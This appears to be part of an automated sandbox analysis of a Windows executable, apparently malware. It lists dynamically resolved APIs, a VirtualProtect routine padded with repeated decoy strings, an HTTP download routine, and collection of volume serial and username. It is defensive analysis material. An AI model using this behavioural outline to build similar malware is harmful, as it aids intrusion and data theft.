                                  • GetProcAddress.KERNEL32(75900000,017306D8), ref: 00E79BF1
                                  • GetProcAddress.KERNEL32(75900000,01730798), ref: 00E79C0A
                                  • GetProcAddress.KERNEL32(75900000,017306A8), ref: 00E79C22
                                  • GetProcAddress.KERNEL32(75900000,01730708), ref: 00E79C3A
                                  • GetProcAddress.KERNEL32(75900000,01730558), ref: 00E79C53
                                  • GetProcAddress.KERNEL32(75900000,01738958), ref: 00E79C6B
                                  • GetProcAddress.KERNEL32(75900000,017258E8), ref: 00E79C83
                                  • GetProcAddress.KERNEL32(75900000,01725AE8), ref: 00E79C9C
                                  • GetProcAddress.KERNEL32(75900000,01730678), ref: 00E79CB4
                                  • GetProcAddress.KERNEL32(75900000,01730720), ref: 00E79CCC
                                  • GetProcAddress.KERNEL32(75900000,01730738), ref: 00E79CE5
                                  • GetProcAddress.KERNEL32(75900000,017307B0), ref: 00E79CFD
                                  • GetProcAddress.KERNEL32(75900000,01725B48), ref: 00E79D15
                                  • GetProcAddress.KERNEL32(75900000,017307E0), ref: 00E79D2E
                                  • GetProcAddress.KERNEL32(75900000,01730570), ref: 00E79D46
                                  • GetProcAddress.KERNEL32(75900000,01725B88), ref: 00E79D5E
                                  • GetProcAddress.KERNEL32(75900000,01730750), ref: 00E79D77
                                  • GetProcAddress.KERNEL32(75900000,01730900), ref: 00E79D8F
                                  • GetProcAddress.KERNEL32(75900000,01725A08), ref: 00E79DA7
                                  • GetProcAddress.KERNEL32(75900000,01730858), ref: 00E79DC0
                                  • GetProcAddress.KERNEL32(75900000,01725A28), ref: 00E79DD8
                                  • LoadLibraryA.KERNEL32(01730840,?,00E76CA0), ref: 00E79DEA
                                  • LoadLibraryA.KERNEL32(01730870,?,00E76CA0), ref: 00E79DFB
                                  • LoadLibraryA.KERNEL32(017308E8,?,00E76CA0), ref: 00E79E0D
                                  • LoadLibraryA.KERNEL32(017308D0,?,00E76CA0), ref: 00E79E1F
                                  • LoadLibraryA.KERNEL32(01730888,?,00E76CA0), ref: 00E79E30
                                  • GetProcAddress.KERNEL32(75070000,017308A0), ref: 00E79E52
                                  • GetProcAddress.KERNEL32(75FD0000,017308B8), ref: 00E79E73
                                  • GetProcAddress.KERNEL32(75FD0000,01738BE0), ref: 00E79E8B
                                  • GetProcAddress.KERNEL32(75A50000,01738DA8), ref: 00E79EAD
                                  • GetProcAddress.KERNEL32(74E50000,01725928), ref: 00E79ECE
                                  • GetProcAddress.KERNEL32(76E80000,01738968), ref: 00E79EEF
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00E79F06
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00E79EFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 2be697ba5fa1e563c938525d9f2d622301daedb301332d11ff2350f6b23133b2
                                  • Instruction ID: 624fe3f2df4e2178bc4ab3e1b9849b2fc76d92e26c7edc2c21ab4e8efc436bce
                                  • Opcode Fuzzy Hash: 2be697ba5fa1e563c938525d9f2d622301daedb301332d11ff2350f6b23133b2
                                  • Instruction Fuzzy Hash: 23A1FFF6514200AFC36CDFA9E8989667BFAA74D7017108A3AF929C369CD73495C0DF60
                                  Function 00E64610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 e64610-e646e5 RtlAllocateHeap 781 e646f0-e646f6 764->781 782 e6479f-e647f9 VirtualProtect 781->782 783 e646fc-e6479a 781->783 783->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E6465E
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E647EC
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E647B5
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E647CB
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E646BD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E6478F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64779
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E646D3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64667
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E646C8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E6476E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64688
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64707
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E646B2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64784
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64693
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64728
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E6471D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E647AA
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64672
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E646A7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E6479F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E647C0
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E6467D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64712
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64763
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E64643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E646FC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E6462D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 32268c1658f83628b758b84e1a80ca1e62f00fa8c35b8027df971f877c63ea99
                                  • Instruction ID: 3dcc597e6109bf3202e5e5b1ab278527e758719848a7a643285fc2b5b0a1045c
                                  • Opcode Fuzzy Hash: 32268c1658f83628b758b84e1a80ca1e62f00fa8c35b8027df971f877c63ea99
                                  • Instruction Fuzzy Hash: A6410BA57C6714EDCA2CB7AC884DDAD769D5F42F10F50764AA84C762B1CEF05500C739
                                  Function 00E662D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 e662d0-e6635b call e7aab0 call e64800 call e7aa50 InternetOpenA StrCmpCA 1040 e66364-e66368 1033->1040 1041 e6635d 1033->1041 1042 e6636e-e66392 InternetConnectA 1040->1042 1043 e66559-e66575 call e7aab0 call e7ab10 * 2 1040->1043 1041->1040 1045 e6654f-e66553 InternetCloseHandle 1042->1045 1046 e66398-e6639c 1042->1046 1062 e66578-e6657d 1043->1062 1045->1043 1048 e6639e-e663a8 1046->1048 1049 e663aa 1046->1049 1051 e663b4-e663e2 HttpOpenRequestA 1048->1051 1049->1051 1052 e66545-e66549 InternetCloseHandle 1051->1052 1053 e663e8-e663ec 1051->1053 1052->1045 1055 e66415-e66455 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 e663ee-e6640f InternetSetOptionA 1053->1056 1058 e66457-e66477 call e7aa50 call e7ab10 * 2 1055->1058 1059 e6647c-e6649b call e78ad0 1055->1059 1056->1055 1058->1062 1067 e6649d-e664a4 1059->1067 1068 e66519-e66539 call e7aa50 call e7ab10 * 2 1059->1068 1071 e664a6-e664d0 InternetReadFile 1067->1071 1072 e66517-e6653f InternetCloseHandle 1067->1072 1068->1062 1076 e664d2-e664d9 1071->1076 1077 e664db 1071->1077 1072->1052 1076->1077 1078 e664dd-e66515 call e7acc0 call e7abb0 call e7ab10 1076->1078 1077->1072 1078->1071
                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E64800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E64889
                                    • Part of subcall function 00E64800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E64899
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • InternetOpenA.WININET(00E80DFF,00000001,00000000,00000000,00000000), ref: 00E66331
                                  • StrCmpCA.SHLWAPI(?,0173E308), ref: 00E66353
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E66385
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0173DAB0,00000000,00000000,00400100,00000000), ref: 00E663D5
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E6640F
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E66421
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E6644D
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E664BD
                                  • InternetCloseHandle.WININET(00000000), ref: 00E6653F
                                  • InternetCloseHandle.WININET(00000000), ref: 00E66549
                                  • InternetCloseHandle.WININET(00000000), ref: 00E66553
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: cc553bf35b8541e4f4077c7a4d424288f1865e8d5cd97ce85f297105a328d297
                                  • Instruction ID: 8545ac6f73bdc47c42aeb9b697aaf5fd5af4500ec19782b041db1ed5f1031f3e
                                  • Opcode Fuzzy Hash: cc553bf35b8541e4f4077c7a4d424288f1865e8d5cd97ce85f297105a328d297
                                  • Instruction Fuzzy Hash: 7D716E71A50218ABDB24EF90DC59FEEB7B9BB44700F1095A8F10A7B1C4DBB06A84CF51
                                  Function 00E77690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 e77690-e776da GetWindowsDirectoryA 1357 e776e3-e77757 GetVolumeInformationA call e78e90 * 3 1356->1357 1358 e776dc 1356->1358 1365 e77768-e7776f 1357->1365 1358->1357 1366 e77771-e7778a call e78e90 1365->1366 1367 e7778c-e777a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 e777a9-e777b6 call e7aa50 1367->1369 1370 e777b8-e777e8 wsprintfA call e7aa50 1367->1370 1377 e7780e-e7781e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E776D2
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E7770F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E77793
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E7779A
                                  • wsprintfA.USER32 ref: 00E777D0
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: b0fefc0674baf310f57b611243dafd8d0a8cf667ec83f32476152562b67cc6d5
                                  • Instruction ID: 23ceb615deaa9acbb1bd346e7f976cccbc8f2028616a1626dd01c7b9d6e9e16b
                                  • Opcode Fuzzy Hash: b0fefc0674baf310f57b611243dafd8d0a8cf667ec83f32476152562b67cc6d5
                                  • Instruction Fuzzy Hash: F241C2B1D04348ABDB14DF94DC85BDEBBB8EF08704F1040A9F609BB284D7746A84CBA5
                                  Function 00E779E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E611B7), ref: 00E77A10
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E77A17
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E77A2F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 3b7db77f84e10e0c8b178b7034cd5c5961f7988e49990d319fbfa640f039d198
                                  • Instruction ID: 666ab0925eba53e63ddb6c4851c0a0597c821fa7fe9b1908770fb69f40b2b764
                                  • Opcode Fuzzy Hash: 3b7db77f84e10e0c8b178b7034cd5c5961f7988e49990d319fbfa640f039d198
                                  • Instruction Fuzzy Hash: 9FF04FB1D44209EBDB14DF98DD45BAEBBB8EB05B21F10422AF615A2684C7B51540CBA1
                                  Function 00E61160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
